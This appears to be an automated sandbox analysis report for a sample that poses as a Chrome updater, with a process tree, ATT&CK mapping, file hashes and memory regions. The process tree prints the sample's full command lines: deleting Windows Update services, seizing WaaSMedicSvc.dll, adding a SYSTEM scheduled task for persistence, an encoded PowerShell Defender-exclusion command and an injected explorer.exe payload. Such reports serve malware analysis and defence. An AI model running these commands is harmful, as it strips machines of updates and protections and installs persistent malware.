- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1584

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:1988

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:2028

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:1968

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1080

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:1608

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1664

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:568

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies security service
- Modifies registry key
PID:908

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:1688

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:1900

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1880

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:520

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1952

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1732

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1636

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1064

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:964

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:568

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:1620

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:1680

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:2020

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:992

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:2016

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1680

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1260

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
4⤵
- Suspicious use of WriteProcessMemory
PID:856

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
5⤵
- Creates scheduled task(s)
PID:1956

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
5⤵
PID:1256

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\Temp\run.bat" "
2⤵
- Drops startup file
PID:556

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Windows\Temp\lol.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1772

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1644

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1644 CREDAT:275457 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1212

C:\Windows\system32\taskeng.exe
taskeng.exe {C1EC3BD8-F256-466F-9D7D-309DD8E25285} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1972

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1516

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
3⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AZAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYgBuAGQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdgAjAD4A"
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1216

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:868

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1012

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:1832

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:688

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:1256

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1988

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:1352

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:980

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:1952

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:556

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1420

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1688

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1636

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1228

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:852

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1944

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:1964

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:848

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:1060

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:856

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:1640

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:796

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1260

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
PID:1112

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:992

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:520

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:636

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1348

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "ivghlzjths"
4⤵
PID:1420

C:\Windows\explorer.exe
C:\Windows\explorer.exe vvvdfgdxkkyjtyx1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8V1TH/rzrH+5OFPPAv1/5dL41W8yrIZ7P3dmb8QzXJF+
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1640

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
7.3MB

MD5
84029d73b99cc7e8b7e80d61143a532f

SHA1
518c2673fb0de02b6eab1fb7f2a28e46761370ba

SHA256
e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772

SHA512
50ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
7.3MB

MD5
84029d73b99cc7e8b7e80d61143a532f

SHA1
518c2673fb0de02b6eab1fb7f2a28e46761370ba

SHA256
e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772

SHA512
50ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
340B

MD5
33772e3cf9c142d3f80e4e977e06c9a0

SHA1
298b74ca67fe72c91dc03b17c55a6f9df9933c1f

SHA256
0f9acae17f0f62e119e5ba30472a09fe557d7fffe835b3ccaa51937bf8b7b5bc

SHA512
a0e13056481396f99d267a2cefef42e93e737e00ae9f65f56457887c45892a953c4bd52a8b46aa6e7b17deacbae3036a777b72109ff36ff1ec84f98fd213bbc9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\3PEDW1FM.txt
Filesize
602B

MD5
29f523f911b9979ad80d63f3b5d132f9

SHA1
c9bcc9309f96d21af13742f8143996e47bdaaa67

SHA256
8b200dce92dff208465ed45f49514a818cd48362b619afe48e592703e876e554

SHA512
8f753a1a2b1452242d5e4109f03e2c86405e3adf94d4af5037197426f15d7ec41b1e5e5d6fcd603821fdf40b6d76ee30f0a86b261f67e82190c29332bf5b4852

Download Submit
C:\Windows\Temp\lol.bat
Filesize
59B

MD5
f580e0e80cc87b25e38ea2c0c8059d04

SHA1
299f51dca9c609d6da86f93c424e39c1e6ba0d94

SHA256
9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

SHA512
5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

Download Submit
C:\Windows\Temp\run.bat
Filesize
98B

MD5
731afe244b2414169a5f630d52646e56

SHA1
e3771ccdccd8c306ee5fc4f264cfc3310690458c

SHA256
6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

SHA512
84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

Download Submit
C:\Windows\Temp\setup.exe
Filesize
7.3MB

MD5
84029d73b99cc7e8b7e80d61143a532f

SHA1
518c2673fb0de02b6eab1fb7f2a28e46761370ba

SHA256
e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772

SHA512
50ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62

Download Submit
C:\Windows\Temp\setup.exe
Filesize
7.3MB

MD5
84029d73b99cc7e8b7e80d61143a532f

SHA1
518c2673fb0de02b6eab1fb7f2a28e46761370ba

SHA256
e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772

SHA512
50ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
c5227366b7a688ff23b01788718251aa

SHA1
9795262e79c832ba49c744fcd1b1794c0ffb5c6a

SHA256
789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48

SHA512
8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe

Download Submit
\Program Files\Google\Chrome\updater.exe
Filesize
7.3MB

MD5
84029d73b99cc7e8b7e80d61143a532f

SHA1
518c2673fb0de02b6eab1fb7f2a28e46761370ba

SHA256
e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772

SHA512
50ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62

Download Submit
\Windows\Temp\setup.exe
Filesize
7.3MB

MD5
84029d73b99cc7e8b7e80d61143a532f

SHA1
518c2673fb0de02b6eab1fb7f2a28e46761370ba

SHA256
e3c6f2d415a9f9d4f845ba2cd8ef07986a6b4db1d50b145b548b907c26fef772

SHA512
50ed354e3a76affa07e94984b40c13ab5c3ecb7285047550613c6b80235c04feb2ad303e32ec04c81864e2c652270c788311e4223bfe0e94a7addba8cd127e62

Download Submit
memory/520-113-0x0000000000000000-mapping.dmp

Download
memory/556-58-0x0000000000000000-mapping.dmp

Download
memory/556-123-0x0000000000000000-mapping.dmp

Download
memory/572-137-0x0000000001150000-0x0000000001156000-memory.dmp

Filesize
24KB

Download
memory/636-116-0x0000000000000000-mapping.dmp

Download
memory/688-115-0x0000000000000000-mapping.dmp

Download
memory/796-135-0x0000000000000000-mapping.dmp

Download
memory/848-131-0x0000000000000000-mapping.dmp

Download
memory/852-128-0x0000000000000000-mapping.dmp

Download
memory/856-85-0x0000000000000000-mapping.dmp

Download
memory/856-133-0x0000000000000000-mapping.dmp

Download
memory/868-109-0x0000000000000000-mapping.dmp

Download
memory/912-54-0x0000000074DB1000-0x0000000074DB3000-memory.dmp

Filesize
8KB

Download
memory/912-59-0x0000000003CA0000-0x0000000004964000-memory.dmp

Filesize
12.8MB

Download
memory/980-121-0x0000000000000000-mapping.dmp

Download
memory/992-111-0x0000000000000000-mapping.dmp

Download
memory/1012-112-0x0000000000000000-mapping.dmp

Download
memory/1016-74-0x000007FEED150000-0x000007FEEDCAD000-memory.dmp

Filesize
11.4MB

Download
memory/1016-75-0x0000000002894000-0x0000000002897000-memory.dmp

Filesize
12KB

Download
memory/1016-76-0x000000001B6F0000-0x000000001B9EF000-memory.dmp

Filesize
3.0MB

Download
memory/1016-71-0x0000000000000000-mapping.dmp

Download
memory/1016-77-0x0000000002894000-0x0000000002897000-memory.dmp

Filesize
12KB

Download
memory/1016-78-0x000000000289B000-0x00000000028BA000-memory.dmp

Filesize
124KB

Download
memory/1060-132-0x0000000000000000-mapping.dmp

Download
memory/1112-108-0x0000000000000000-mapping.dmp

Download
memory/1216-82-0x0000000000000000-mapping.dmp

Download
memory/1216-107-0x0000000000000000-mapping.dmp

Download
memory/1228-127-0x0000000000000000-mapping.dmp

Download
memory/1232-70-0x000007FEFB6E1000-0x000007FEFB6E3000-memory.dmp

Filesize
8KB

Download
memory/1232-69-0x000000001B9E0000-0x000000001BDFE000-memory.dmp

Filesize
4.1MB

Download
memory/1232-67-0x0000000000230000-0x000000000064E000-memory.dmp

Filesize
4.1MB

Download
memory/1256-117-0x0000000000000000-mapping.dmp

Download
memory/1256-89-0x0000000000000000-mapping.dmp

Download
memory/1260-136-0x0000000000000000-mapping.dmp

Download
memory/1260-84-0x0000000000000000-mapping.dmp

Download
memory/1348-118-0x0000000000000000-mapping.dmp

Download
memory/1352-120-0x0000000000000000-mapping.dmp

Download
memory/1420-124-0x0000000000000000-mapping.dmp

Download
memory/1420-142-0x0000000000060000-0x0000000000067000-memory.dmp

Filesize
28KB

Download
memory/1420-143-0x0000000000860000-0x0000000000866000-memory.dmp

Filesize
24KB

Download
memory/1420-138-0x0000000000060000-0x0000000000067000-memory.dmp

Filesize
28KB

Download
memory/1420-140-0x0000000000000000-mapping.dmp

Download
memory/1516-97-0x0000000000400000-0x00000000010C4000-memory.dmp

Filesize
12.8MB

Download
memory/1516-91-0x0000000000000000-mapping.dmp

Download
memory/1516-95-0x0000000000400000-0x00000000010C4000-memory.dmp

Filesize
12.8MB

Download
memory/1516-96-0x0000000076CC0000-0x0000000076E69000-memory.dmp

Filesize
1.7MB

Download
memory/1516-98-0x0000000076CC0000-0x0000000076E69000-memory.dmp

Filesize
1.7MB

Download
memory/1584-79-0x0000000000000000-mapping.dmp

Download
memory/1636-126-0x0000000000000000-mapping.dmp

Download
memory/1640-155-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1640-170-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1640-134-0x0000000000000000-mapping.dmp

Download
memory/1640-158-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1640-146-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1640-168-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1640-167-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1640-165-0x000000014036EAC4-mapping.dmp

Download
memory/1640-164-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1640-162-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1640-161-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1640-160-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1640-148-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1640-145-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1640-169-0x0000000000170000-0x0000000000190000-memory.dmp

Filesize
128KB

Download
memory/1640-156-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1640-152-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1640-81-0x0000000000000000-mapping.dmp

Download
memory/1640-150-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1640-154-0x0000000140000000-0x0000000140809000-memory.dmp

Filesize
8.0MB

Download
memory/1652-65-0x0000000076CC0000-0x0000000076E69000-memory.dmp

Filesize
1.7MB

Download
memory/1652-64-0x0000000000400000-0x00000000010C4000-memory.dmp

Filesize
12.8MB

Download
memory/1652-56-0x0000000000000000-mapping.dmp

Download
memory/1652-68-0x0000000000400000-0x00000000010C4000-memory.dmp

Filesize
12.8MB

Download
memory/1680-83-0x0000000000000000-mapping.dmp

Download
memory/1688-125-0x0000000000000000-mapping.dmp

Download
memory/1728-87-0x0000000000000000-mapping.dmp

Download
memory/1772-60-0x0000000000000000-mapping.dmp

Download
memory/1832-114-0x0000000000000000-mapping.dmp

Download
memory/1876-104-0x0000000001174000-0x0000000001177000-memory.dmp

Filesize
12KB

Download
memory/1876-106-0x000000000117B000-0x000000000119A000-memory.dmp

Filesize
124KB

Download
memory/1876-100-0x0000000000000000-mapping.dmp

Download
memory/1876-102-0x000007FEEC8E0000-0x000007FEED303000-memory.dmp

Filesize
10.1MB

Download
memory/1876-103-0x000007FEEBD80000-0x000007FEEC8DD000-memory.dmp

Filesize
11.4MB

Download
memory/1876-105-0x000000000117B000-0x000000000119A000-memory.dmp

Filesize
124KB

Download
memory/1944-129-0x0000000000000000-mapping.dmp

Download
memory/1952-122-0x0000000000000000-mapping.dmp

Download
